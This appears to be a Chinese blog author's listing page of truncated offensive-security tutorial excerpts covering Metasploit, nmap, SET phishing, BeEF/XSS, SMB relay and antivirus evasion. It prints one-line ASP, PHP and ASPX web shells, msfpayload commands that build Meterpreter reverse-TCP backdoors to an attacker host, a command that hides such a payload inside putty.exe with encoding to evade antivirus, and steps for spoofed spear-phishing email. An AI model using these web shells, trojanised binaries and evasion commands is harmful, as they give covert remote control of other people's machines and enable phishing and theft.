信安微凉
这个作者很懒,什么都没留下…
展开
-
Linux下的 菜刀 webhandler
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。Asp环境:<%eval request("a")%>Php环境:<?php @eval($_POST['a']);?>Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>原创 2022-03-23 20:48:32 · 1801 阅读 · 0 评论 -
网络扫描 信息探测之Metasploit 服务探测
msf auxiliary(ack) > use auxiliary/scanner/Display all 236 possibilities? (y or n)目前有236 模块,包括思科 各种数据库 各种服务,例子:我要探测SMB服务msf auxiliary(ack) > search smb path:scannerMatching Modules================ Name...原创 2022-03-14 22:21:57 · 203 阅读 · 0 评论 -
网络扫描 信息探测之Metasploit 端口探测
msf > use auxiliary/scanner/portscan/(输入两下TAB键盘键)use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/tcpuse auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/xmasuse auxiliary/scanner/portscan/syn...原创 2022-03-14 22:20:48 · 211 阅读 · 0 评论 -
网络扫描 : nbtscan
安装root@Kali:/# mkdir /pen/scanner/root@Kali:~# cd /pen/scanner/root@Kali:/pen/scanner# mkdir ntscanroot@Kali:/pen/scanner# cd ntscan/root@Kali:/pen/scanner/ntscan# wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgzroot@Kali:/pen/scanne原创 2022-03-14 22:19:46 · 889 阅读 · 0 评论 -
网络扫描 nmap 和 Metasploit 自动溢出
原理: 让NMAP通过扫描网络主机,导入METASPLOIT,利用插件自动溢出1.安装插件root@Kali:~# cd .msf4/root@Kali:~/.msf4# lsconfig history john.pot local logs loot modcache modules plugins schemaroot@Kali:~/.msf4# cd plugins/root@Kali:~/.msf4/plugins# wget https://r...原创 2022-03-12 22:25:04 · 383 阅读 · 0 评论 -
网络扫描 nmap 和 Metasploit 数据转换
自带Metasploit里面能自动导入,启动MSF并且连接数据库 删除久数据root@Kali:~# msfconsole -y /1.yml msf > hosts -dHosts=====address mac name os_name os_flavor os_sp purpose info comment...原创 2022-03-12 22:21:47 · 1671 阅读 · 0 评论 -
网络扫描 : nmap 常见扫描方式3
请背诵本章保存XML-oXroot@Kali:~# nmap 192.168.40.129 -oX 1.xmlStarting Nmap 6.01 ( http://nmap.org ) at 2012-06-19 08:06 PDTNmap scan report for 192.168.40.129Host is up (0.00038s latency).Not shown: 996 filtered portsPORT STATE SERVICE23/...原创 2022-03-12 22:19:55 · 4837 阅读 · 0 评论 -
网络扫描 : nmap 常见扫描方式2
请背诵本文!!!!!!!!!!!!!!!!!!NMAP更具什么来判断服务?root@Kali:/pen/nmap/share/nmap# pwd/pen/nmap/share/nmaproot@Kali:/pen/nmap/share/nmap# lsnmap.dtd nmap-os-db nmap-protocols nmap-service-probes nmap.xslnmap-mac-prefixes nmap-payloads nmap-r...原创 2022-03-11 22:55:19 · 4544 阅读 · 0 评论 -
网络扫描 : nmap 常见扫描方式
请背诵本章!!!!!!!!!!!!!!!!!!!!!!!!打开ub1,nmap最新版本是6.0,所以删除以前安装的5.6版本,安装新版本删除:root@Kali:/# cd /pen/root@Kali:/pen# rm -rf nmap下载安装root@Kali:/pen# wget http://nmap.org/dist/nmap-6.01.tar.bz2 -O /tmp/nmaproot@Kali:/pen# cd /tmproot@Kali:/tmp# tar xf原创 2022-03-10 22:52:00 · 4820 阅读 · 0 评论 -
插队:微观metasploit的漏洞源代码
微观例子:Symantec Web Gateway 5.0.2.8 Command Execution 地址:http://packetstormsecurity.org/files/113090/Symantec-Web-Gateway-5.0.2.8-Command-Execution.html首先简单的看一下:require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking.原创 2022-03-10 22:49:36 · 157 阅读 · 0 评论 -
中间人攻击 tcpdump 截获数据
一般LINUX主机都默认安装了他 So,直接说如何使用截获5.5.5.130的全部数据 ,5.5.5.130访问百度root@Kali:~# tcpdump host 5.5.5.130tcpdump: verbose output suppressed, use -v or -vv for full protocol decodelistening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes03:52:57原创 2022-03-10 22:46:20 · 338 阅读 · 0 评论 -
Nessus :MSF的数据导入
如果没用MSF链接NESSYS,如何导入扫描数据?启动MSF 链接数据库 先删除以前的旧数据 hosts -dmsf > hostsHosts=====address mac name os_name os_flavor os_sp purpose info comments------- --- ---- -------...原创 2022-03-04 23:21:58 · 476 阅读 · 0 评论 -
Nessus : 配合METASPLOIT
启动NESSUS,启动MSF,启动MSF的时候要链接数据库载入NESSUS插件:msf > load nessus[*] Nessus Bridge for Metasploit 1.1[+] Type nessus_help for a command listing[*] Successfully loaded plugin: nessusmsf >你现在可以输入nessus_help 查看帮助鸟然后链接数据库nessus_connect 账号:密码@安装NES原创 2022-03-04 23:16:23 · 340 阅读 · 0 评论 -
set: 配置邮箱欺骗
编辑SET配置文件 吧:SENDMAIL=OFF 改为:SENDMAIL=ON安装发射器:root@Kali:/pen/set# apt-get install sendmail启动SETroot@Kali:/pen/set# ./set选择1 1) Social-Engineering Attacks选择:1. Spear-Phishing Attack Vectors3个选项: 1) Perform a Mass Email Attack 2) Create a ...原创 2022-03-04 23:07:43 · 457 阅读 · 0 评论 -
SET: 配合METASPLOIT的攻击
首先停止APACHE2运行root@Kali:/pen/set# /etc/init.d/apache2 stop* Stopping web server apache2 ... waiting [ OK ]root@Kali:/pen/set#启动SET:root@...原创 2022-03-02 22:56:22 · 206 阅读 · 0 评论 -
安装配置 SET 工具
打开UB1 下载SET: 1 2 root@Kali:~# cd /pen/ root@Kali:/pen# svn co http://svn.secmaniac.com/social_engineering_toolkit set/ 安装:root@Kali:/pen# cd set/root@Kali:/pen/set# lsconfig readme set set-proxy setup.py...原创 2022-03-02 22:51:42 · 1016 阅读 · 0 评论 -
Metasploit 针对WEB的攻击
这个是一个自动化WEB安全检测工具,看官方咋吹的吧:Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.Arachni is smart, it trains itself by learning from the原创 2022-02-28 21:01:25 · 197 阅读 · 0 评论 -
Metasploit XSSF攻击插件的利用
安装xssfroot@Dis9Team:~# cd /tmproot@Dis9Team:/tmp# wget xssf.googlecode.com/files/XSSF-2.1.tar复制到METASPLOIT目录root@Dis9Team:/tmp# mkdir 1root@Dis9Team:/tmp# mv XSSF-2.1.tar 1root@Dis9Team:/tmp# cd 1/root@Dis9Team:/tmp/1# tar xf XSSF-2.1.tar root原创 2022-02-28 20:55:39 · 7515 阅读 · 0 评论 -
MSF 综合利用: BEEF & XSS攻击(炊少教学)
获得Beef先安装git apt-get install gitbrk@Dis9Team:/pen$ sudo git clone https://github.com/beefproject/beef配置和安装数据库支持: apt-get install libssl-dev libsqlite3-dev sqlite我用sqlite数据库 简单 不麻烦RUBY配置:brk@Dis9Team:/pen/beef$ sudo gem install bundlerFetch原创 2022-02-27 21:56:05 · 377 阅读 · 0 评论 -
MSF 综合利用: MYSQL & SMBRelay攻击(炊少教学)
下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!下面来PENTEST : 一个注入点,他是ROOT的权限我们来尝试他能不能读文件,ROOT权限应该能读恩 ,能读文件 (惊现HELEL大黑客!)下面本地伪造个SMB SERVER服务器 msf > use auxiliary/server/capture/smb msf auxiliary(smb) > show ...原创 2022-02-27 21:52:40 · 642 阅读 · 0 评论 -
Metasploit 权限提升(炊少教学)
前言 现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的gu原创 2022-02-26 22:58:31 · 572 阅读 · 0 评论 -
Metasploit reverse Shell的免杀(炊少教学)
rootkithat是我以前的马甲 以前写的文章我们先生成一个X64的WINDOWS XP 的reverse SHELL 12 root@rootkithat:/opt/framework-3.7.1/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4321 R > /tmp/xp.exe 提示:你可以用 scheduleme -m 1 -u e /tm原创 2022-02-25 12:42:51 · 326 阅读 · 0 评论 -
Metasploit的捆绑后门(炊少教学)
绑定payload 至一个可执行文件,让目标不知不觉间中招,以putty.exe 为例: 1 ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 假如选择一个GUI 界面的程序作为绑定目标并且不使用-原创 2022-02-25 12:41:02 · 794 阅读 · 0 评论 -
Metasploit可执行后门(炊少教学)
他能生成LINUX WINDOWS PHP ASP JSP等等的后门哦msfpayload as shellcoderoot@Dis9Team:/home/brk# msfpayload -l他能生成多种多样的简单的来说一个正常的Windows后门:用的是:windows/meterpreter/reverse_tcpmsfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \ m..原创 2022-02-25 12:39:14 · 99 阅读 · 0 评论 -
Metasploit的PAYLOAD(炊少教学)
PAYLOAD是啥子? 就是SHELLCODE,就是METASPLOIT的后门方式,正对WINDOWS LINUX等等都用最长用的是:windows/meterpreter/reverse_tcp我们来换一个,我要他弹窗: Hacked By Dis9 Team打开UB1 XP2 1用exploit/windows/browser/ms10_018_ie_behaviors来做演示 123456789101112131415161718192021原创 2022-02-23 21:49:38 · 273 阅读 · 0 评论 -
Metasploit的本地漏洞利用教学(炊少)
Metasploit的本地漏洞利用这个很简单的理解,本地例如: RAR ZIP 播放器等等,当我们用MSF生成漏洞文件后,别人用特定的工具打开,就会中马打开UB 1 ,我们来利用ZIP吧,启动METASPLOIT 搜索rar 12345678910111213141516171819202122232425262728293031 msf > search zipMatching Mo..原创 2022-02-23 21:42:06 · 130 阅读 · 0 评论